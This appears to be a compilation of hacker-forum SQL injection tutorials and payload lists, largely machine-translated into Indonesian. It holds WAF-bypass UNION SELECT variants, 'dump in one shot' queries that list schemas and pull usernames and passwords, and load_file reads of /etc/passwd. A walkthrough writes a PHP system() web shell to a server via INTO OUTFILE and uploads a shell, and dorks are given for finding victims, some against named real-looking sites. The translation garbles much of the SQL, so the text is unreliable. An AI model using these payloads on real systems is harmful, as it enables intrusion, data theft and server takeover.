3783bypass5: /*!UNION /*!SeLeCT*/ 1,2,concat_ws(0x7c,table_name) from information_schema.tables where table_schema=database()-- -
3784bypass6: /*!UNION /*!SeLeCT*/ 1,2,concat_ws(0x7c,table_name) from information_schema./*!tables*/ where table_schema=database()-- -
3785bypass7: /*!UNION /*!SeLeCT*/ 1,2,concat_ws(0x7c,column_name) from information_schema./*!columns*/ where table_name=0x(convert to hex)-- -
3786bypass8: /*!UNION /*!SeLeCT*/ 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x7c,abc),14,15,16,17,18 from xyz-- -
3787
3788
3789SQLi Waf Bypass
3790
3791/*!31337ConCaT*/(0x496e6a656374656420627920316d70333231756d3c62723e486f73746e616d653a20,@@hostname,0x3c62723e44617461626173653a20,database/**X**/(),0x3c62723e56657273696f6e3a20,version/**X**/(),0x3c62723e557365723a20,user/**X**/(),0x3c62723e,(/*!31337sELecT*/(@)/*!31337from*/(/*!31337sELecT*/(@:=0x00),(/*!31337sELecT*/(@)/*!31337from*/(`InFoRMAtiON_sCHeMa`.`ColUMNs`)/*!31337where*/(`TAblE_sCHemA`=DaTaBaSe/**X**/())and(@)in(@:=/*!31337CoNCat*/(@,0x3c62723e20,/*!31337TaBLe_nAMe*/,0x203a3a20,/*!31337column_name*/))))a))
3792
3793(/*!31337select*//*!31337concat*/(0x496e6a6563746564206279204e64697669633430343c62723e44617461626173653a20,database/**/(),0x3c62723e56657273696f6e3a20,version/**/(),0x3c62723e,@:=0x2d2d2d,(/*!31337select*/count(*)/*!31337from*//*!31337information_schema*/./*!31337columns*//*!31337WhErE*/(/*!31337TaBlE_ScHeMa*/!=0x696e666f726d6174696f6e5f736368656d61)AND@:=/*!31337concat*/+(@,0x3c62723e,/*!31337table_name*/,0x3a3a,/*!31337column_name*/)),@))
3794
3795+div+@div:=(/*!31337concat*/(@c:=0x00,if((/*!31337select*/+/*!31337count*/(*)/*!31337from*/+/*!31337information_schema*/./*!31337columns*/+/*!31337where*/+/*!31337table_schema*/=database/*ndivic*/()+and+@c:=/*!31337concat*/(@c,0x3c62723e, /*!31337table_name*/,0x2e,/*!31337column_name*/)),0x00,0x00),@c))+/*!31337UNION*/+ALL+/*!31337SELECT*/+
3796
3797Hai Im Ph.h4rh4r dari Blue Security Hackers
3798
3799Saya akan menunjukkan itu adalah Metode berbasis String
3800
3801Situs contoh: http://www.gwapoako.com/readnews.php?id=6
3802
38031: meninggalkan akhir 'pre check jika vuln situs dalam injeksi sql
3804http://www.gwapoako.com/readnews.php?id=6 '
3805
3806Peringatan: mysql_fetch_array () mengharapkan parameter 1 menjadi sumber daya, boolean diberikan dalam /home/jungleisland/gwapoako.com/readnews.php on line 34
3807
3808kesalahan db? berarti rentan.
3809
3810ini adalah cara mendapatkan metode berbasis string di situs
3811
38122: tingkatkan akhir Anda
3813http://www.gwapoako.com/readnews.php?id=6 ''
3814
3815tidak ada kesalahan diba? berarti Metode Berbasis String tidak akan digunakan
3816
3817kami memiliki contoh yang dapat digunakan untuk Metode Berbasis String
3818Contoh:
3819'- -
3820'- +
3821
38223: periksa apakah beberapa kolom berada di situs menggunakan pesanan oleh.
3823http://www.gwapoako.com/readnews.php?id=6 'pesanan sebesar 5-- -
3824
3825memesan dengan 5 kesalahan pesanan pero ung oleh 4 ok
3826berarti ung situs 4 kolom saya
3827
38284: menggunakan union pilih.
3829http://www.gwapoako.com/readnews.php?id=6 'serikat pilih 1,2,3,4-- -
3830
3831Contoh Anda melihat 3 dan 4, itu berarti kolom yang rentan
3832
38335: Saya akan menggunakan SANG PENCIPTA untuk membuat saya mudah
3834(Dengan peretasan)
3835DIOS = Dump Dalam Satu Tembakan
3836
3837Ini akan menggunakan kueri pra-dump pada tabel dan kolom situs. dan query n ini diletakkan pada kolom vuln pro I letakkan s 3 kolom 3 juga dapat nmn s kolom 4
3838
3839make_set (6, @ = 0x0a, (/ *! 50000select * / (1) dari (/*!50000information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!50000table_name*/,/ *! 50000column_name * /)), @)
3840
3841serikat http://www.gwapoako.com/readnews.php?id=6' pilih 1,2, make_set (6, @ = 0x0a, (/ *! 50000select * / (1) dari (/ *! 50000information_schema. kolom * / di mana @ = make_set (511, @, 0x3c6c693e, / * 50000table_name * / / * 50000column_name * /)), @), 4) -!! 20%
3842
3843Selesai 🙂 Selamat Meretas 🙂
3844
3845saya akan memberitahu methodh tentang shell upload melalui query
3846Pertama-tama menemukan situs web yang rentan terhadap injeksi sql. Anda dapat menemukan situs web oleh dorks atau secara manual seperti saya telah menemukan ini.
3847Anda membutuhkan 2 hal utama:
38481- Jalur Akar dari situs web
38492- Direktori yang bisa ditulisi
3850Sebagian besar waktu, Anda akan melihat jalan root dalam kesalahan SQL situs tersebut. Seperti yang berikut.
3851Peringatan: mysql_fetch_assoc () mengharapkan parameter 1 sebagai sumber daya, boolean diberikan di /home/aeiti/public_html/admin/requires/functions.php on line 1327
3852Nah Jika situs web yang rentan tidak menunjukkan jalur root maka jangan khawatir saya akan menunjukkan cara untuk mengetahui jalur root. Dan Juga Direktori yang Dapat Ditulis.
3853http://www.jantv.in/comments/showmore.php?id=68884 '
3854Saya tidak memulai dengan abc dari SQLI Saya harap Anda tahu dasar-dasarnya. : D
3855Sekarang kita harus menemukan kolom situs web kemudian kolom yang rentan seperti situs saya memiliki 11 kolom dan 5 kolom rentan
3856http://www.jantv.in/comments/showmore.php?id=68884 'UniOn SeleCt 1,2,3,4,5,6,7,8,9,10,11-- -
3857http://www.jantv.in/comments/showmore.php?id=68884 'UniOn SeleCt 1,2,3,4, versi (), 6,7,8,9,10,11-- -
3858Mari Coba Coba Muat Berkas Situs Web
3859http://www.site.in/comments/showmore.php?id=68884 'UniOn SeleCt 1,2,3,4, load_file (' / etc / passwd '), 6,7,8,9,10, 11-- -
3860http://www.site.in/comments/showmore.php?id=68884 'UniOn SeleCt 1,2,3,4, load_file (' / etc / my.cnf '), 6,7,8,9, 10,11-- - -
3861http://www.site.in/comments/showmore.php?id=68884 'UniOn SeleCt 1,2,3,4, load_file (' / etc / group '), 6,7,8,9,10, 11-- -
3862http://www.site.in/comments/showmore.php?id=68884 'UniOn SeleCt 1,2,3,4, load_file (' / etc / services '), 6,7,8,9,10, 11-- -
3863http://www.site.in/comments/showmore.php?id=68884 'UniOn SeleCt 1,2,3,4, load_file (' / etc / hosts '), 6,7,8,9,10, 11-- -
3864Kami tidak perlu membaca file apa pun yang disebutkan di atas hanya untuk menambah pengetahuan Anda. Sekarang kita harus memeriksa hak akses file untuk pengguna saat ini untuk pertama kali ini Anda harus menemukan nama pengguna saat ini.
3865Seperti ini
3866http://www.jantv.in/comments/showmore.php?id=68884 'UniOn SeleCt 1,2,3,4, current_user, 6,7,8,9,10,11-- -
3867Nama Pengguna Saat Ini kami adalah root
3868Sekarang Periksa Privilages File untuk root Pengguna
3869http://www.jantv.in/comments/showmore.php?id=68884 'UniOn SeleCt 1,2,3,4, file_priv, 6,7,8,9,10,11 DARI mysql.user WHERE pengguna = 'root' - -
3870yang menunjukkan Y :)
3871Jika itu menunjukkan Y (ya) pada kolom rentan situs web yang berarti kita memiliki hak akses file untuk root pengguna saat ini
3872Dan jika tidak menunjukkan Y maka jangan buang waktu Anda di sana: D
3873Sekarang kita harus menemukan direktori yang bisa ditulisi untuk ini Anda dapat menggunakan google dorks juga dan pengetahuan Anda juga :)
3874tapi di sini kamu akan terjebak untuk menemukan direktori ....
3875saya tahu Anda berpikir bahwa Anda akan meletakkan 'dan Anda akan mendapatkan direktori dalam kesalahan: p :)
3876http://www.jantv.in/comments/showmore.php?id=68884 '
3877Lihat tidak ada diektori: D
3878sekarang
3879ada satu lagi trik untuk mendapatkan direktori
3880gunakan "[]" ini sebelumnya = 68884
3881seperti
3882http://www.jantv.in/comments/showmore.php?id[]=68884
3883coba lihat apa yang akan terjadi
3884lihat di sini kita mendapatkan direktori :) :)
3885sekarang kita akan mengunggah kode jahat kita di kolom vuln 3 :): D: D
3886http://www.jantv.in/comments/showmore.php?id=68884 'UniOn SeleCt 1,2,3,4, "<? system ($ _ REQUEST [' sembarang perintah u punya :) ']) ;? > ", 6,7,8,9,10,11 ke dalam file 'outfile' ke C: /wamp/www/comments/name_u_want.php '- + -
3887tapi aku punya milikku :)
3888saya hanya mengubah kode saya di Hex :)
3889http://www.jantv.in/comments/showmore.php?id=68884'+UNION+ALL+SELECT+1,2,3,4,0x3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646 ke outfile 'C: / wamp / www / comments / any_name_u_want. php '- + -
3890maka kamu akan mendapatkan seperti itu artinya kamu meng-upload kode ur :)
3891lalu periksa
3892http://www.jantv.in/comments/any_name_u_typed.php: D
3893Anda akan mendapatkan opsi browse di mana Anda dapat memilih shell Anda
3894biarkan melihat
3895yang saya singkirkan shell saya :): D saya menemukan shell itu oleh Anas bro thnks Anas bro :)
3896ok sekarang lihat opsi unggah
3897klik di atasnya
3898sekarang lihat file berhasil diunggah :)
3899sekarang buka dengan metode yang sama seperti sebelumnya
3900http://www.jantv.in/comments/any_name_of_any_thing_u_uploaded.php
3901lihat wee berhasil meng-upload shell via query sqli :)
3902
3903Terima kasih
3904
3905http: // www.che.iitm.ac. di / dalam .php? id = 6
3906http: // www.che.iitm.ac. di / dalam .php? id = 6 'Union Select 1,2-- -
3907jika Anda mencoba untuk menyeimbangkan pesanan secara normal oleh atau grup saat itu Anda akan
3908temukan 2 kolom && this shit error "Pernyataan SELECT yang digunakan memiliki jumlah kolom yang berbeda"
3909Dalam jenis kesalahan ini kami mencoba beberapa metode seperti
3910Kolom 1.Bruteforce,
39112.do hex di semua kolom
39123. menghasilkan query + dll
39134. atau berbasis kesalahan
3914Ada opsi lain untuk menyeimbangkan permintaan seperti ini ...
3915+ GROUP + BY + 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 , 24,25,26,27,
3916Sekarang coba cara ini untuk mendapatkan kolom
3917http://www.che.iitm.ac.in/inner.php?id=6 '+ GROUP + BY
3918+ 1, 2,3, 4, 5, 6, 7,8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25 , 26, 27, -
3919Kolom tidak dikenal '8' di 'pernyataan grup'
3920jadi ada 7 kolom :)
3921Mari coba ini
3922http: // www.che.iitm.ac. di / dalam .php? id = 6 'dan 0 Union Pilih 1,2,3,4,5,6,7-- -
3923tetapi ini "Pernyataan SELECT yang digunakan memiliki jumlah kolom yang berbeda" lagi: 3
3924Sekarang coba cara Anda untuk melewati kesalahan ini
3925http://www.che.iitm.ac.in/inner.php?id=6 'dan 0 Union
3926Pilih 111, 2222,3333, 4444, 5555,6666, 7777-- -
3927tidak berfungsi
3928http: // www.che.iitm.ac. dalam / inner .php? id = 6 'dan 0 Union Select versi (), versi (), versi (), versi (), versi (), versi (), versi () - -
3929juga tidak berfungsi
3930Anda dapat mencoba lebih banyak cara lain seperti mengganti col palsu, nol atau kekuatan kasar, bt yang panjang
3931Dalam tantangan ini saya menemukan sesuatu yang berbeda ...
3932: 3
3933ok mari coba kueri yang diarahkan
3934Kita tahu dalam query yang diarahkan setiap kolom diganti dengan nol atau hex dengan satu "'" atau "1' - -"
3935http://www.che.iitm.ac.in/inner.php?id=-6 'Union
3936Pilih 1, 0x3227, 3, 4, 5, 6,7 - -
3937:)
3938ditemukan kesalahan dalam kolom no. 2
3939http: // www.che.iitm.ac. di / dalam .php? id = - 6 'Union Select 1, "2' - -", 3,4,5,6,7-- -
3940:)
3941Jika Anda mencoba ini, Anda akan menemukan kolom 4 secara otomatis
3942: D
3943atau Anda dapat melakukan penyatuan berdasarkan lagi kolom yang diarahkan ini
3944tapi saya katakan menggunakan serikat pilih hanya 1 kali
3945sekarang yang lain adalah tugas yang mudah
3946Terima kasih .....
3947
3948
3949SQL COMMENTS
3950‘ or 1=1#‘ or 1=1– –‘ or 1=1/* (MySQL < 5.1)
3951' or 1=1;%00
3952' or 1=1 union select 1,2 as `
3953' or#newline1='1'
3954or– -newline1='1'
3955/*!50000or*/1='1'
3956/*!or*/1='1
3957[-----------------------------------------------------]
3958PREFIXES
3959+ – ~ !
3960‘ or –+2=- -!!!’2
3961[-----------------------------------------------------]
3962OPERATORS
3963^, =, !=, %, /, *, &, &&, |, ||, , >>, <=, <=, ,,
3964XOR, DIV, LIKE, SOUNDS LIKE, RLIKE, REGEXP, LEAST, GREATEST, CAST, CONVERT, IS, IN, NOT, MATCH, AND, OR, BINARY,BETWEEN, ISNULL
3965[-----------------------------------------------------]
3966WHITESPACES
3967%20 %09 %0a %0b %0c %0d %a0 /**/
3968‘or+(1)sounds/**/like“1“–%a0-
3969‘union(select(1),tabe_name,(3)from`information_schema`.`tables`)#
3970[-----------------------------------------------------]
3971No Whitespace Bypass Using Comments
3972?id=1/*comment*/and/**/1=1/**/--
3973No Whitespace Bypass Using Parenthesis
3974?id=(1)and(1)=(1)--
3975[-----------------------------------------------------]
3976EXTRACT SUBSTRINGS
3977substr(‘abc’,1,1) = ‘a’
3978substr(‘abc’ from 1 for 1) = ‘a’
3979substring(‘abc’,1,1) = ‘a’
3980substring(‘abc’ from 1 for 1) = ‘a’
3981mid(‘abc’,1,1) = ‘a’
3982mid(‘abc’ from 1 for 1) = ‘a’
3983lpad(‘abc’,1,space(1)) = ‘a’
3984rpad(‘abc’,1,space(1)) = ‘a’
3985left(‘abc’,1) = ‘a’
3986reverse(right(reverse(‘abc’),1)) = ‘a’
3987insert(insert(‘abc’,1,0,space(0)),2,222,space(0)) = ‘a’
3988space(0) = trim(version()from(version()))
3989`
3990`
3991`
3992©M4c
3993
3994SQL INJECTION: BYPASSING WAF (WEB APPLICATION FIREWALL)
3995*** tutorial ini untuk menunjukkan kepada Anda bagaimana cara Bypass WAF (Aplikasi Web Firewall) ***
3996http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=-130+Union+select+1,2,3,4,5,6,7,8,9--
3997seperti yang kita lihat [pilih] adalah down double text [Mengganti kata kunci] seperti SeLselectECT ini
3998www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=-130+UnIoN+SeLselectECT+1,2,3,4,5,6,7,8,9--
3999[5] WAF Bypassing - menggunakan karakter.
4000Ada banyak sekali karakter yang tersedia yang dapat kita gunakan untuk mem-bypass filter WAF.
4001karakter berikut dapat melakukan ini:
4002|,?, ", ', *,%, £, [],;,:, \ /, $, €, () ...
4003dengan menggunakan karakter ini dalam banyak kasus / *! * / tidak difilter. Tetapi tanda * diganti dengan spasi dan kesatuan - pilih disaring. yang berarti mengganti kata kunci tidak akan berfungsi.
4004Dalam kasus ini kita dapat menggunakan karakter * untuk memisahkan kata kunci.
4005Kami akan melakukan hal logis berikutnya:
4006www. [situs] .com / index.php? id = -1 + uni * pada + sel * ect + 1,2,3,4 - + -
4007Hampir sama dengan membagi kata kunci.
4008Tetapi dalam hal ini hanya * disaring oleh itu menggantikannya sedikit pun ruang memiliki hasil yang sama seperti dalam membagi kata kunci.
4009[6] Advanced WAF Bypassing - Kapitalisasi.
4010Cara lain adalah dengan hanya memanfaatkan karakter kita.
4011Daripada unIoN serikat Dalam beberapa dasar WAF ini akan berhasil.
4012Contoh di URL:
4013www. [site] .com / index.php? id = -1 + UnIoN + SeLeCt + 1,2,3,4 - + -
4014[7] Polusi Parameter HTTP (HPP)
4015HTTP Parameter Pollution (HPP) adalah teknik penghindaran serangan Web yang memungkinkan penyerang untuk membuat permintaan HTTP untuk memanipulasi atau mengambil informasi tersembunyi. Teknik pengelakan ini didasarkan pada pemisahan vektor serangan antara beberapa contoh parameter dengan nama yang sama. Karena tidak ada RFC HTTP yang relevan mendefinisikan semantik manipulasi parameter HTTP, setiap platform pengiriman aplikasi web dapat mengatasinya secara berbeda. Secara khusus, beberapa lingkungan memproses permintaan seperti itu dengan menggabungkan nilai-nilai yang diambil dari semua contoh nama parameter dalam permintaan. Perilaku ini disalahgunakan oleh penyerang untuk mem-bypass mekanisme keamanan berbasis pola.
4016kita melihat dua vektor injeksi SQL: "Regular attack" dan "Attack using HPP". Serangan reguler menunjukkan injeksi SQL standar dalam parameter prodID. Serangan ini dapat dengan mudah diidentifikasi oleh mekanisme deteksi keamanan, seperti Firewall Aplikasi Web (WAF). Serangan kedua [Gambar 2] menggunakan HPP pada parameter prodID. Dalam hal ini, vektor serangan didistribusikan di beberapa kejadian parameter prodID. Dengan kombinasi yang tepat dari lingkungan teknologi dan server web, serangan itu berhasil. Agar WAF untuk mengidentifikasi dan memblokir vektor serangan lengkap yang diperlukan untuk juga memeriksa input gabungan.
4017http://testasp.vulnweb.com/showforum.asp?id=-1 union pilih 1,2 -
4018testasp.vulnweb.com/showforum.asp?id=-1/* & id = * / union / * & id = * / select / * & id = * / 1,2 -
4019Teknik HPP
4020Spoiler (Klik untuk Melihat)
4021[8] Teknik Bypass WAF CRLF
4022CR LF berarti "Pengangkutan Kembali, Umpan Jalur"
4023CR LF berarti "Carriage Return, Line Feed" -itu adalah hangover DOS dari masa lalu ketika beberapa perangkat memerlukan Pengembalian Pengangkutan, dan beberapa perangkat membutuhkan Feed Line untuk mendapatkan baris baru, sehingga Microsoft memutuskan untuk membuat baris memiliki kedua karakter, sehingga mereka akan menampilkan dengan benar di semua perangkat.
4024Program Windows mengharapkan format baris baru mereka di CRLF (\ r \ n). * nix hanya mengharapkan data LF (\ n). Jika Anda membuka dokumen teks Unix di Notepad pada windows, Anda akan melihat bahwa semua jeda baris menghilang dan seluruh dokumen berada pada satu baris. Itu karena Notepad mengharapkan data CRLF, dan dokumen Unix tidak memiliki karakter.
4025Ada aplikasi yang akan mengkonversi ini untuk Anda pada distro * nix standar (dos2unix dan unix2dos)
4026Bagi mereka yang bertanya-tanya, pengembalian pengangkutan dan feed garis berbeda dari kembali pada hari-hari Mesin Ketik, ketika pengembalian carriage dan feed baris adalah dua hal yang berbeda. Satu akan membawa Anda ke awal baris (Carriage Return) dan satu akan memindahkan Anda satu baris lebih rendah, tetapi di lokasi horizontal yang sama (Line Feed)
4027Teknik CRLF
4028Sintaks:
4029Kode PHP:
4030% 0A% 0D + Pernyataan Mysql +% 0A% 0D
4031? id = -2 +% 0A% 0D / *!% 0A% 0Dunion * / +% 0A% 0D / *! 50000Pilih * /% 0A% 0D / *! + 77771,77772, unhex (hex (/ *! kata sandi * /)), 77774 + dari + / *! `Users` * / - -
4032Contoh di URL:
4033fpchurch.org.uk/News/view.php?id=-26+%0A%0Dunion%0A%0D+%0A%0Dselect%0A%0D+1,2,3,4,5 -
4034[9] Kesalahan Fatal Terjadi melewati
4035untuk memahami bagaimana kami dapat melewati Fatal Error Terjadi lihat Contoh ini:
4036Contoh di URL:
4037http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,2,3,4,5,6,7,8--
4038Yang disimpulkan bahwa kesalahan dalam struktur salah satu kolom Untuk menghindari kesalahan ini cobalah mengubah nilai kolom kolom kata null satu per satu: -
4039Kode PHP:
4040http://wwfa.org.uk/article.php?id=-174 UNION SELECT null, 2,3,4,5,6,7,8-- Kesalahan
4041http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1, null, 3,4,5,6,7,8-- Kesalahan
4042http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,2, null, 4,5,6,7,8-- Kesalahan
4043http://wwfa.org.uk/article.
4044
4045DIOS Query Collections
4046
4047
40481. Show All Database --->
4049
4050(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.schemata)where (@a)in (@a:=/*!50000concat*/(@a,schema_name,'
4051'))))a)
4052
40532.Show All Tables --->
4054
4055(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.tables)where (@a)in (@a:=/*!50000concat*/(@a,table_name,'
4056'))))a)
4057
40583. Show All Tables without information_schema ---->
4059
4060(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.tables)where table_schema!='information_schema' and(@a)in (@a:=/*!50000concat*/(@a,table_name,'
4061'))))a)
4062
4063
40644. Show All Database and Tables --->
4065
4066(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.tables)where table_schema!='information_schema' and(@a)in (@a:=/*!50000concat*/(@a,table_schema,0x3a,table_name,'
4067'))))a)
4068
4069
40705. Show All Database and Tables and Columns --->
4071
4072(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns)where table_schema!='information_schema' and(@a)in (@a:=/*!50000concat*/(@a,table_schema,' > ',table_name,' > ',column_name,'
4073'))))a)
4074
4075
40766.Show Target Hacker Tables Name ---->
4077
4078
4079(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns)where table_schema!='information_schema' and table_name like 'Hacker_%' and(@a)in (@a:=concat(@a,table_schema,' > ',table_name,' > ',column_name,'
4080'))))a)
4081
4082
40837.Show Each Table and All Table Columns ---->
4084
4085(select (@a) from (select(@a:=0x00),(@tbl:=0x00),(select (@a) from (information_schema.columns) where (table_schema!='information_schema') and(0x00)in (@a:=concat(@a,0x3c62723e,if( (@tbl!=table_name), Concat(0x3c62723e,table_schema,' :: ',@tbl:=table_name,'',column_name), (column_name))))))a)
4086
40878. Show Each Table with Row Count and All Table Columns ---->
4088
4089(select (@a) from (select(@a:=0x00),(@tbl:=0x00),(@tbl_sc:=0x00),(select (@a) from (information_schema.columns) where (table_schema!='information_schema') and(0x00)in (@a:=concat(@a,0x3c62723e,if( (@tbl!=table_name), Concat(0x3c62723e,@tbl_sc:=table_schema,' :: ',@tbl:=table_name,' (Rows ',(select table_rows from information_schema.tables where table_schema=@tbl_sc and table_name=@tbl),')
4090',column_name), (column_name))))))a)
4091
4092
40939. Show Each Table with Row Count & number order and All Table Columns --->
4094
4095(select (@a) from (select(@a:=0x00),(@tbl:=0x00),(@tbl_sc:=0x00),(@num:=0),(select (@a) from (information_schema.columns) where (table_schema!='information_schema') and(0x00)in (@a:=concat(@a,0x3c62723e,if( (@tbl!=table_name), Concat(0x3c62723e,@num:=(@num%2b1),0x2920,@tbl_sc:=table_schema,' :: ',@tbl:=table_name,' (Rows ',(select table_rows from information_schema.tables where table_schema=@tbl_sc and table_name=@tbl),')
4096',column_name), (column_name))))))a)
4097
4098Or
4099
4100Bypass -->
4101
4102(/*!12345%73elect*/(@a)/*!12345%66rom*/(/*!12345%73elect*/(@a:=0x00),(@tbl:=0x00),(@tbl_sc:=0x00),(@num:=0),(/*!12345%73elect*/(@a)/*!12345%66rom*/(/*!12345`%69nformation_%73chema`.`%63olumns`*/)%77here (`%74able_schema`!=/*!12345'%69nformation_schema'*/)and(0x00)in(@a:=%63oncat%0a(@a,0x3c62723e,if( (@tbl!=/*!12345`table_name`*/), %43oncat%0a(0x3c62723e,@num:=(@num%2b1),0x2920,@tbl_sc:=`table_schema`,0x203a3a20,@tbl:=`%74able_name`,0x2028526f777320,(/*!12345%73elect*/`table_rows`from/*!12345`%69nformation_schema`.`tables`*/where table_schema=@tbl_sc and/*!12345`%74able_name`*/=@tbl),0x293c62723e,/*!12345`%63olumn_name`*/), (/*!12345`%63olumn_name`*/))))))a)
4103
4104
410510. Extract Column Data from Table ------>
4106
4107(select (@) from (select(@:=0x00),(select (@) from (users) where (@)in (@:=concat(@,0x3C,0x62,0x72,0x3E,' [ ',username,' ] > ',pass,' > '))))a)#
4108
4109-h4rh4r
4110
4111Sql Injection types
41121. Error Based Injections (Union Select)
41131. String
41142. Intiger
41152. Error Based Injections (Double Injection Based)
41163. BLIND Injections:
41171.Boolian Based
41182.Time Based
41194. Update Query Injection.
41205. Insert Query Injections.
41216. Header Injections.
41221.Referer based.
41232.UserAgent based.
41243.Cookie based.
4125
4126MYSQL INJECTION - BYPASS UNION SELECT (WAF)
4127WHAT IS BYPASS : when target having WAF (web application firewall) secure encption or security on there server its cannot be directly get any vulnerble columns or its cannot be injeCted! so there haCker try to put diffrent query in combined charachaters encrpted,encoded,modifyed sql query parameters like one called UNION SELECT or UNION ALL SELECT!
4128there is all types of waf bypass method for bypass union select!
4129%55nion(%53elect 1,2,3)-- -
4130+union+distinct+select+
4131+union+distinctROW+select+
4132/**//*!12345UNION SELECT*//**/
4133/**//*!50000UNION SELECT*//**/
4134/**/UNION/**//*!50000SELECT*//**/
4135/*!50000UniON SeLeCt*/
4136union /*!50000%53elect*/
4137+ #‎union + #‎select
4138+ #‎1q %0AuNiOn all#qa%0A#%0AsEleCt
4139/*!%55NiOn*/ /*!%53eLEct*/
4140/*!u%6eion*//*!se%6cect*/
4141+un/**/ion+se/**/lect
4142uni%0bon+se%0blect
4143%2f**%2funion%2f**%2fselect
4144union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
4145REVERSE(noinu)+REVERSE(tceles)
4146/*--*/union/*--*/select/*--*/
4147union(/*!/**/SeleCT */ 1,2,3)
4148/*!union*/+/*!select*/
4149union+/*!select*/
4150/**/union/**/select/**/
4151/**/uNIon/**/sEleCt/**/
4152/**//*!union*//**//*!select*//**/
4153/*!uNIOn*//*!SelECt*/
4154+union+distinct+select+
4155+union+distinctROW+select+
4156uNiOn aLl sElEcT
4157if you got errors! please dnt loose hope! because in haCking! hope is your mirror of future in this ethical word lol i dnt want to be jesus forget these lines and try all method i m sure u got success soon! best of luck happy haCking! ;-)
4158
4159~h4rh4r
4160
4161Di sini Anda akan menemukan tutorial langkah demi langkah yang sangat detail yang ditulis oleh saya (PhortyPhour) tentang injeksi SQL. Ini murni untuk tujuan pendidikan dan akan digunakan atas kebijaksanaan pembaca.
4162
4163Pertama kita harus tahu persis apa itu injeksi SQL.
4164
4165Injeksi SQL adalah teknik injeksi kode yang mengeksploitasi kerentanan keamanan yang terjadi di lapisan basis data aplikasi. Kerentanan hadir ketika input pengguna salah difilter untuk karakter string literal escape yang tertanam dalam pernyataan SQL atau input pengguna tidak diketik kuat dan dengan demikian secara tidak terduga dieksekusi. Ini adalah contoh dari kelas kerentanan yang lebih umum yang dapat terjadi setiap kali salah satu pemrograman atau bahasa scripting tertanam di dalam yang lain. Serangan injeksi SQL juga dikenal sebagai serangan penyisipan SQL.
4166
4167Itu adalah paragraf pertama dari halaman wikipedia untuk SQLi (injeksi SQL) ditemukan di sini:
4168http://en.wikipedia.org/wiki/SQL_injection
4169
4170Saya akan menyarankan membaca seluruh halaman.
4171
4172Apa yang dicakup dalam tutorial ini?
4173
4174Bagian Satu - Penilaian Situs Web
4175Bagian Satu - Menemukan situs web yang rentan
4176Bagian Dua - Menentukan jumlah kolom
4177Bagian Tiga - Menemukan kolom mana yang rentan
4178
4179Bagian Dua - Mengumpulkan Informasi
4180Bagian Satu - Menentukan versi SQL
4181Bagian Dua - Menemukan basis data
4182
4183Bagian Tiga - The Good Stuff
4184Bagian Satu - Menemukan nama-nama tabel
4185Bagian Dua - Menemukan nama-nama kolom
4186Bagian Tiga - Menampilkan isi kolom
4187Bagian Empat - Mencari halaman admin
4188
4189Sekarang mari kita mulai.
4190
4191Bagian Satu - Penilaian Situs Web
4192
4193Agar kami dapat mulai mengeksploitasi situs web, pertama-tama kami harus tahu persis apa yang kami suntikkan. Inilah yang akan kami bahas di Bagian Satu bersama dengan cara menilai informasi yang kami kumpulkan.
4194
4195Bagian Satu - Menemukan situs web yang rentan
4196
4197Situs web yang rentan dapat ditemukan menggunakan dorks (saya akan menyertakan daftar di akhir tutorial ini), baik di Google atau dengan pemindai eksploit. Bagi Anda yang tidak terbiasa dengan istilah "dorks", saya akan mencoba menjelaskan.
4198
4199Dorks adalah URL situs web yang dikenal rentan. Dalam injeksi SQL, dorks ini terlihat seperti ini:
4200
4201Kode:
4202inurl: buy.php? id =
4203
4204Ini akan dimasukkan ke mesin pencari dan karena "inurl:" bagian dari dork, mesin pencari akan mengembalikan hasil dengan URL yang berisi karakter yang sama. Beberapa situs yang memiliki dork ini di situs web mereka mungkin rentan terhadap injeksi SQL.
4205
4206Sekarang katakanlah kami menemukan halaman:
4207
4208Kode:
4209http://www.site.com/buy.php?id=1
4210
4211Untuk menguji situs ini, yang perlu kita lakukan adalah menambahkan 'baik di antara tanda "=" dan "1" atau setelah "1" sehingga terlihat seperti ini:
4212
4213Kode:
4214http://www.site.com/buy.php?id=1 '
4215atau
4216http://www.site.com/buy.php?id='1
4217
4218Setelah menekan enter, jika situs web ini mengembalikan kesalahan seperti berikut:
4219
4220Kode:
4221Peringatan: mysql_fetch_array (): argumen yang disediakan bukanlah sumber daya hasil MySQL yang valid di /home1/michafj0/public_html/gallery.php on line 7
4222
4223Atau sesuatu di sepanjang garis itu, ini berarti rentan terhadap injeksi.
4224
4225Dalam kasus di mana Anda menemukan situs web seperti ini:
4226
4227Kode:
4228http://www.site.com/buy.php?id=1&dog;catid=2
4229
4230Maka Anda harus menggunakan teknik yang sama dengan menambahkan 'kecuali itu harus antara nilai (dalam hal ini nomor) dan operator ("=" tanda) sehingga terlihat seperti ini:
4231
4232Kode:
4233http://www.site.com/buy.php?id='1&dog;catid='2
4234
4235Ada program yang akan melakukan ini untuk Anda tetapi untuk memulai saya akan menyarankan hanya untuk melakukan hal-hal secara manual, menggunakan Google, dan jadi saya tidak akan memposting apa pun untuk Anda. Jika Anda merasa sangat terpaksa untuk menggunakan satu lagi. Saya merekomendasikan Exploit Scanner oleh Reiluke.
4236
4237Bagian Dua - Menentukan jumlah kolom
4238
4239Agar kami dapat menggunakan perintah dan mendapatkan hasil, kami harus tahu berapa banyak kolom yang ada di situs web. Jadi untuk menemukan jumlah kolom kita harus menggunakan metode yang sangat kompleks dan canggih yang saya suka sebut "Trial and Error" dengan perintah ORDER BY Biggrin
4240
4241CATATAN: SQL tidak peduli apakah huruf Anda dikapitalisasi atau tidak dan saya hanya melakukannya karena kejelasan, karena semua yang peduli pertanyaan Anda bisa terlihat seperti ini:
4242
4243Kode:
